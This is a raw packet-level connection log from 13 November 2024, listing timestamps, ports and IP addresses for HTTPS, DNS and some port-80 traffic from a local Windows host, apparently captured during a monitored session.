Nov 13, 2024 20:39:38.206146002 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.206211090 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.206254959 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.206295967 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.206336975 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.206376076 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.207859039 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.208055019 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.208436012 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.212554932 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.213571072 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.213624001 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.276416063 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.276443005 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.276458025 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.276464939 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.282433033 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.282459021 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.284107924 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.284151077 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.284164906 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.284173012 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.284332037 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.284332991 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.284404993 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.284441948 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.285785913 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.285785913 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.285806894 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.285814047 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.817565918 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.817651987 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.817770958 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.819329023 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.819363117 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.819596052 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.824032068 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.824074984 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.825079918 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.825107098 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.825181961 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.825407982 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.825433969 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.827641964 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:38.827652931 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:38.827739000 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:38.828596115 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:38.828610897 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:38.829781055 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.829799891 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.832387924 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.832396984 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.832565069 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.833072901 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.833084106 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.841377020 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.841397047 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.841510057 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.848649025 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.848674059 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.096590042 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:39.096683979 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:39.096837997 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:39.101973057 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:39.102010012 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:39.557349920 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.575853109 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.579088926 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.582607985 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.679264069 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.679289103 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.679833889 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.679837942 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.680403948 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.680414915 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.680716991 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.680721998 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.681008101 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.681037903 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.681832075 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.681837082 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.754976988 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.804781914 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.804883957 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.804960012 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.806168079 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.806344986 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.806488037 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.834531069 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.834558964 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.835022926 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.835028887 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.885323048 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:39.927779913 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:39.927788973 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:39.928612947 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:39.928669930 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:39.954989910 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:39.955092907 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:39.956551075 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:39.956563950 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:39.958867073 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.958888054 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.958899975 CET	49840	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.958905935 CET	443	49840	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.960566998 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.960566998 CET	49841	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.960589886 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.960602999 CET	443	49841	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.964970112 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.964989901 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.965033054 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.965043068 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.965082884 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:39.988081932 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.988352060 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:39.988666058 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.055406094 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.055406094 CET	49832	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.055433989 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.055449963 CET	443	49832	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.059449911 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:40.064626932 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.064626932 CET	49833	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.064640045 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.064647913 CET	443	49833	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.190248966 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.190294981 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.190377951 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.196693897 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:40.197999954 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.198043108 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.208796024 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.208810091 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.208865881 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.209031105 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.209043026 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.210155010 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.210180044 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.210252047 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.221280098 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.223109961 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.223136902 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.223710060 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.223740101 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.224596024 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.224596024 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.224621058 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.224643946 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.224666119 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.224695921 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.224752903 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.224900007 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.224910975 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.228097916 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:40.228161097 CET	443	49839	94.245.104.56	192.168.2.5
Nov 13, 2024 20:39:40.228240013 CET	49839	443	192.168.2.5	94.245.104.56
Nov 13, 2024 20:39:40.564687967 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.565310001 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.565347910 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.565908909 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.565916061 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.573882103 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.573991060 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.574050903 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.574063063 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.574073076 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.574110031 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.581209898 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.581221104 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.581237078 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.581578970 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.581671953 CET	443	49842	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:40.581722021 CET	49842	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:40.692235947 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.692293882 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.692385912 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.692410946 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.692667007 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.692724943 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.693629980 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.693639040 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.693654060 CET	49834	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.693659067 CET	443	49834	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.704497099 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.704540968 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.704602957 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.704761028 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.704770088 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.944209099 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:40.944257021 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:40.949368000 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.951725960 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.956782103 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.975558043 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.975621939 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.976247072 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.976303101 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.976864100 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.976898909 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.977277994 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.977284908 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.977564096 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.977607965 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:40.977931023 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:40.977943897 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.102983952 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.103034019 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.103174925 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.103241920 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.104747057 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.104934931 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.105007887 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.106096983 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.106121063 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.106182098 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.106190920 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.106266975 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.134973049 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.134973049 CET	49845	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.134996891 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.135009050 CET	443	49845	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.140641928 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.140641928 CET	49846	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.140711069 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.140749931 CET	443	49846	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.149960041 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.149960041 CET	49844	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.149980068 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.150002003 CET	443	49844	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.171706915 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.190116882 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.190165043 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.190233946 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.190963984 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.191008091 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.191101074 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.191111088 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.191137075 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.191168070 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.191700935 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.191715956 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.192280054 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.192284107 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.197149992 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.197165966 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.197529078 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.197540998 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.197571039 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.197583914 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.322094917 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.322298050 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.322348118 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.432244062 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:41.432277918 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:41.432327986 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:41.433093071 CET	49857	443	192.168.2.5	142.250.185.97
Nov 13, 2024 20:39:41.433113098 CET	443	49857	142.250.185.97	192.168.2.5
Nov 13, 2024 20:39:41.433763027 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.433763027 CET	49847	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.433799028 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.433823109 CET	443	49847	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.454221964 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.454309940 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.454391003 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.468518972 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.511121988 CET	49858	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.511163950 CET	443	49858	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.514978886 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.515016079 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.515613079 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.515618086 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.551158905 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:41.556217909 CET	53	49860	1.1.1.1	192.168.2.5
Nov 13, 2024 20:39:41.556281090 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:41.556374073 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:41.556385040 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:41.559480906 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:41.561321974 CET	53	49860	1.1.1.1	192.168.2.5
Nov 13, 2024 20:39:41.561402082 CET	53	49860	1.1.1.1	192.168.2.5
Nov 13, 2024 20:39:41.561608076 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:41.561636925 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:41.562087059 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:41.562952995 CET	49861	443	192.168.2.5	2.23.209.175
Nov 13, 2024 20:39:41.562966108 CET	443	49861	2.23.209.175	192.168.2.5
Nov 13, 2024 20:39:41.575397015 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:41.575416088 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:41.575526953 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:41.575891018 CET	49867	443	192.168.2.5	18.65.39.56
Nov 13, 2024 20:39:41.575905085 CET	443	49867	18.65.39.56	192.168.2.5
Nov 13, 2024 20:39:41.610455036 CET	53	49860	1.1.1.1	192.168.2.5
Nov 13, 2024 20:39:41.638878107 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:41.639240980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:41.644817114 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.645421028 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.645482063 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.645541906 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.645554066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.645644903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:41.645658970 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.645675898 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.645710945 CET	49852	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.645716906 CET	443	49852	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.646929026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:41.646972895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:41.651849031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.651866913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.651875973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.652215004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:41.656132936 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.656220913 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.656292915 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.656493902 CET	49874	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.656512976 CET	443	49874	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.934269905 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.946918011 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.951514959 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.951605082 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.952099085 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.952116013 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.952662945 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.952680111 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.953102112 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:41.953105927 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:41.965728045 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.008972883 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.009062052 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.009329081 CET	49853	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.009346008 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.058358908 CET	53	49860	1.1.1.1	192.168.2.5
Nov 13, 2024 20:39:42.062525988 CET	49860	53	192.168.2.5	1.1.1.1
Nov 13, 2024 20:39:42.078221083 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.078327894 CET	443	49855	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.078435898 CET	49855	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.108979940 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.109155893 CET	443	49854	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.109242916 CET	49854	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:42.153983116 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.154146910 CET	443	49853	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:42.154225111 CET	49853	443	192.168.2.5	13.107.246.45
